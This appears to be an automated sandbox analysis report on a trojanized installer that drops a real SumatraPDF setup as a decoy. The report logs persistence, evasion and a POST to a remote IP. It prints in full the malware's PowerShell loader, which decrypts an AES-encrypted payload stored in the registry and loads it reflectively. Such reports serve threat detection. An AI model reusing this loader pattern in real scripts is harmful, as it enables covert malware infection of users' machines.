      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://ocsp.comodoca.com0
      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://ocsp.sectigo.com0
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://ocsps.ssl.com0
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://ocsps.ssl.com0?
      Source: powershell.exe, 0000000F.00000002.22279126520.0000022080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.0000022191DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://sslcom.crl.certum.pl/ctnca.crl0s
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://sslcom.ocsp-certum.com08
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://sslcom.repository.certum.pl/ctnca.cer0:
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://www.daisy.org/z3986/2005/ncx/
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://www.gribuser.ru/xml/fictionbook/2.0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: http://www.idpf.org/2007/opf
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcom-RootCA-EV-RSA-4096-R2.crt0
      Source: i2wBlKtxrM.exe | String found in binary or memory: http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0
      Source: powershell.exe, 0000000F.00000002.22279126520.0000022080001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.22320458549.0000022191DD1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://forum.sumatrapdfreader.org/https://github.com/sumatrapdfreader/sumatrapdf/blob/master/AUTHOR
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/blob/master/TRANSLATORSlast
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/%s)
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E09B000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/7a19622d5ad35702dad2694cca4873693e88bc4e)
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/commit/7a19622d5ad35702dad2694cca4873693e88bc4egit
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://github.com/sumatrapdfreader/sumatrapdf/discussions/2316
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://http://https://translate.google.com/?sl=auto&tl=$
      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://sectigo.com/CPS0
      Source: i2wBlKtxrM.exe | String found in binary or memory: https://www.certum.pl/CPS0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.deepl.com/translator#en/$
      Source: i2wBlKtxrM.exe | String found in binary or memory: https://www.ssl.com/repository0
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/UninstallStringhttps://www.sumatrapdfreader.org/docs/Version-histor
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/dl/prerel/PRE_RELEASE_VER/SumatraPDF-prerel
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa
      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/docs/Corrupted-installation
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/docs/How-to-contribute-translation.htmlhttps://www.google.com/searc
      Source: sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/docs/Installer-cmd-line-arguments
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/docs/Submit-crash-report.htmlFailed
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/download-free-pdf-viewer
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr | String found in binary or memory: https://www.sumatrapdfreader.org/manual.htmlSumatraPDF
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-4-6.html
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/settings/settings3-4-6.html8.33
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txt
      Source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org/update-check-rel.txtLatestInstaller64
      Source: sumpdf-installer-x64-bundle.exe.4.drString found in binary or memory: https://www.sumatrapdfreader.org0
      Source: unknownHTTP traffic detected: POST / HTTP/1.1Host: 146.70.104.173Content-Length: 494Expect: 100-continueConnection: Keep-Alive
      Source: unknownDNS traffic detected: queries for: www.sumatrapdfreader.org
      Source: unknownHTTPS traffic detected: 104.26.8.244:443 -> 192.168.0.90:49827 version: TLS 1.2

      System Summary

      Source: amsi64_14196.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: Process Memory Space: powershell.exe PID: 6416, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
      Source: i2wBlKtxrM.exe, MainApp.csLong String: Length: 1093768
      Source: i2wBlKtxrM.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
      Source: amsi64_14196.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: Process Memory Space: powershell.exe PID: 6416, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess Stats: CPU usage > 98%
      Source: i2wBlKtxrM.exe, 00000004.00000000.17016029626.000000000706D000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameinstaller.exe@ vs i2wBlKtxrM.exe
      Source: i2wBlKtxrM.exeBinary or memory string: OriginalFilenameinstaller.exe@ vs i2wBlKtxrM.exe
      Source: i2wBlKtxrM.exeStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_BITMAP type: ump; GLS_BINARY_LSB_FIRST
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: Resource name: RT_ICON type: ump; GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeSection loaded: edgegdi.dll
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeSection loaded: edgegdi.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
      Source: i2wBlKtxrM.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknownProcess created: C:\Users\user\Desktop\i2wBlKtxrM.exe C:\Users\user\Desktop\i2wBlKtxrM.exe
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe "C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe"
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowerShell.exe" -command "$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]3,173,118,126,231,161,139,192,229,141,204,156,132,100,48,106,235,67,30,141,248,153,154,213,216,50,229,134,16,171,109,238);$A.IV=@([byte]201,234,4,140,115,200,164,199,43,168,227,197,101,4,86,9);$F=(get-itemproperty 'HKCU:\Software\Classes\rfg1dcnqkaz').'(default)';[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[kemCiD76HlG1Vs2OPA8cqjGCkrCqhXCzjexLEW2LxjRUMlEqNPHprYoTm9lbu6vtunojB72JkixZX3sSwfGVTdwCSSzECXsoGC.k71MR3w83P167odlfS1wNy2AFqYTQl9Bufz4ZvpO0Mceu64ndEff]::KEqMIs3CK5uPwc0wNJHou0Kdkh_iB1('CW2TM3BL19P97XCM5KU1REEJ00X0IVIU');
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\Documents\20230614
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hicmcvjw.wpz.ps1
      Source: classification engineClassification label: mal60.troj.evad.winEXE@11/16@2/3
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile read: C:\Users\desktop.ini
      Source: i2wBlKtxrM.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\0715c4fdaf0442fe6a5f74fe860f1fef\mscorlib.ni.dll
      Source: i2wBlKtxrM.exe, MainApp.csBase64 encoded string:
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeMutant created: \Sessions\1\BaseNamedObjects\QABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZNHRsXA5ZS6KAKZXZD9OkUxVECKYReMDNCozJQOXQPEKTXe3DEaMVOEyj4VCB0XEPihZsBZTyMNQMK1GOCgVOSKZCXXZ2VW_BUVC
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: del SumatraPDF. cn: SumatraPDF co:Installazione di SumatraPDF micca trova. cy:Heb ganfod gosodiad SumatraPDF. cz:Instalace programu SumatraPDF nebyla nalezena. de:SumatraPDF-Installation nicht gefunden. dk:SumatraPDF-installatio
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: SumatraPDF. my:Pemasangan SumatraPDF tidak dijumpai. ne:SumatraPDF . nl:SumatraPDF-installatie niet gevonden. nn:SumatraPDF-installeringa blei ikkje funnet. no:SumatraPDF installerin
      Source: sumpdf-installer-x64-bundle.exeString found in binary or memory: SumatraPDF %s my:Installer SumatraPDF %s ne:Sumatrapdf %s nl:SumatraPDF %s installatieprogramma nn:SumatraPDF %s-installerer no:SumatraPDF %s installering pl:Instalator SumatraPDF %s pt:Instalador do SumatraPDF %s ro:Programul
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
      Source: i2wBlKtxrM.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
      Source: i2wBlKtxrM.exeStatic file information: File size 114486352 > 1048576
      Source: i2wBlKtxrM.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
      Source: i2wBlKtxrM.exeStatic PE information: certificate valid
      Source: i2wBlKtxrM.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x21d800
      Source: i2wBlKtxrM.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x6b0e400
      Source: i2wBlKtxrM.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: System.Management.Automation.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.Core.pdb00525341310004000001000100b5fc90e7027f67871e773a8fde8938c81dd402ba65b9201d60593e96c492651e889cc13f1415ebb53fac1131ae0bd333c5ee6021672d9718ea31a8aebd0da0072f25d87dba6fc90ffd598ed4da35e44c398c454307e8e33b8426143daec9f596836f97c8f74750e5975c64e2189f source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa! source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: https://www.sumatrapdfreader.org/dl/rel/3.4.6/SumatraPDF-3.4.6-64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:UsersuserDesktopsumpdf-installer-x64-bundle.exeC:\Program FilesC:\Users\user\DesktopC:\Users\user\Desktop\crashinfoC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmpC:\Users\user\Desktop\crashinfo\sumatrapdfcrash.txtC:\Users\user\Desktop\crashinfo\SumatraPDF.pdbC:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdbC:\Users\user\Desktop\crashinfo\libmupdf.pdbInstallCrashHandler crashDumpPath: 'C:\Users\user\Desktop\crashinfo\sumatrapdfcrash.dmp' source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E073000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb` source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290C0008000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\dll\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: e.pdb&Qp source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000A.00000003.21807249713.00000290BFFEF000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: -64.pdb.lzsa source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: System.Management.Automation.pdbp; source: powershell.exe, 0000000F.00000002.22527395464.00000220EF8DB000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\user\Desktop\crashinfo\libmupdf.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: icrosoft.Powershell.PSReadline.pdbY source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: :%d.pdb.epubRootPageLayout&lt;<<html> source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: \??\C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Utilityne.PDBj_: source: powershell.exe, 0000000A.00000003.21607887098.00000290BFFE9000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: SumatraPDF.pdbSumatraPDF-dll.pdblibmupdf.pdbInstallCrashHandler: skipping because !crashDumpPath source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: fileDjVufileXPSfilePSfilePDFfileGiffileJpegfilePngfileChmfileJxrfileTgafileBmpfileTifffileJp2fileWebpfileWdpfileHdpfileCbtfileCb7fileCbrfileCbzfileTarfile7ZfileRarfileZipfileEpubdirectoryfileFb2zfileFb2fileTxtfileHTMLfilePalmDocfileMobifoo.epub.txt.js.json.xml.logfile_id.dizread.me.nfo.tcr.ps.ps.gz.eps.fb2.fb2z.fbz.zfb2.fb2.zip.cbz.cbr.cb7.cbt.pdf.xps.oxps.chm.png.jpg.jpeg.gif.tif.tiff.bmp.tga.jxr.hdp.wdp.webp.epub.mobi.prc.azw.azw1.azw3.pdb.html.htm.xhtml.svg.djvu.jp2.zip.rar.7z.heic.tarfileHeicfileSvg7z source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: C:\Users\kjk\src\sumatrapdf\out\rel64\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: Binary string: C:\Users\user\Desktop\crashinfo\SumatraPDF-dll.pdb source: sumpdf-installer-x64-bundle.exe, 00000007.00000002.22270298543.000002018E060000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000000F.00000002.22527395464.00000220EF938000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: Bookmark Shortcuts%.2flnkfitwidthfitpage"%s" -page %d -view "%s" -zoom %s -scroll %d,%dfitcontentSelect folder with PDF filesBookmark shortcut to page %s of %s*.xps;*.oxps*.pdf*.ps;*.eps*.djvu*.chm*.cbz;*.cbr;*.cb7;*.cbt*.svgSVG documents*.mobi*.epub*.pdb;*.prc*.fb2;*.fb2z;*.zfb2;*.fb2.zip*.bmp;*.dib;*.gif;*.jpg;*.jpeg;*.jxr;*.png;*.tga;*.tif;*.tiff;*.webpImagesAll supported documents*.txt;*.log;*.nfo;file_id.diz;read.me;*.tcrVK_UP source: sumpdf-installer-x64-bundle.exe, 00000007.00000000.17266004670.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe, 00000007.00000002.22279117962.00007FF710ED3000.00000002.00000001.01000000.00000008.sdmp, sumpdf-installer-x64-bundle.exe.4.dr
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 17_2_00007FFEB7C61C7D push eax; retf 17_2_00007FFEB7C61C7E
      Source: sumpdf-installer-x64-bundle.exe.4.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeFile created: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\53q2yv23ir3.lnk
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value created or modified: HKEY_CURRENT_USER_Classes\rfg1dcnqkaz NULL
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion

      Source: i2wBlKtxrM.exe Static PE information: Resource name: RT_RCDATA size: 0x6b02e00
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 5388 Thread sleep count: 9107 > 30
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3796 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3840 Thread sleep count: 32 > 30
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe TID: 3796 Thread sleep time: -600000s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 25292 Thread sleep count: 8701 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 40820 Thread sleep count: 8542 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 78240 Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe Thread delayed: delay time: 600000
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe Window / User API: threadDelayed 9107
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8701
      Source: C:\Windows\System32\conhost.exe Window / User API: threadDelayed 899
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8542
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 8671
      Source: C:\Users\user\Desktop\sumpdf-installer-x64-bundle.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
      Source: C:\Users\user\Desktop\i2wBlKtxrM.exe Process information queried: ProcessInformation
